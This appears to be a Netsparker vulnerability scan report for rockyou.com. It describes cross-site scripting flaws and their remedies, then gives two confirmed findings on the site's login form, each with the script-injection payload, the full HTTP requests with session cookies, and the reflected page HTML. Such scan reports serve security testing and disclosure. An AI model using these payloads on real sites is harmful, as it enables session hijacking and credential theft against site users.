rockyou.com, XSS DORK REPORT SUMMARYLoading
Netsparker - Scan Report Summary
|
||||||||||
|
Total RequestsAverage Speedreq/sec. |
56
identified
43
confirmed
0
critical
3
informational
|
||||||||
GHDB, DORK TestsGHDB, DORK Tests
|
||||||||||
|
Authentication
Scheduled
|
|||||||||
VULNERABILITIESVulnerabilities
|
||
 |
IMPORTANT
71 %
MEDIUM
16 %
LOW
7 %
INFORMATION
5 %
|
|
Cross-site Scripting
Cross-site Scripting
38
TOTAL
IMPORTANT
CONFIRMED
37
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
Remedy References
External References
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| pass | POST | '"--></style></script><script>alert(0x0006BB)</script> |
| user | POST | 3 |
| mode | POST | create |
| source | POST | 3 |
| flixster | POST | 3 |
| toscheck | POST | 1 |
| birthyear | POST | 3 |
| sex | POST | 3 |
| country | POST | 0 |
| postalcode | POST | 3 |
Request
POST /login.php HTTP/1.1
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163961; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006BB)%3c%2fscript%3e&user=3&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163961; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006BB)%3c%2fscript%3e&user=3&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:59:22 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:59:21 GMT; path=/; domain=.rockyou.com,lastlogin=1303163962; expires=Wed, 27-Jul-2011 21:59:22 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 21:59:22 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 21:59:22 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 21:59:22 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=108082 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9055
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x0006BB)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option>&l..
Date: Mon, 18 Apr 2011 21:59:22 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 21:59:21 GMT; path=/; domain=.rockyou.com,lastlogin=1303163962; expires=Wed, 27-Jul-2011 21:59:22 GMT; path=/; domain=.rockyou.com,sns_type=facebook.com; expires=Mon, 25-Apr-2011 21:59:22 GMT; path=/; domain=.rockyou.com,pubtype=facebook; expires=Sun, 12-Jan-2014 21:59:22 GMT; path=/; domain=.rockyou.com,ultype=facebook; expires=Sun, 12-Jan-2014 21:59:22 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=108082 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9055
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x0006BB)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option>&l..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| pass | POST | 3 |
| user | POST | '"--></style></script><script>alert(0x0006E7)</script> |
| mode | POST | create |
| source | POST | 3 |
| flixster | POST | 3 |
| toscheck | POST | 1 |
| birthyear | POST | 3 |
| sex | POST | 3 |
| country | POST | 0 |
| postalcode | POST | 3 |
Request
POST /login.php HTTP/1.1
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163971; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
pass=3&user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006E7)%3c%2fscript%3e&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Referer: http://www.rockyou.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303163971; ctid=2; sns_type=facebook.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
pass=3&user='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0006E7)%3c%2fscript%3e&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:59:32 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
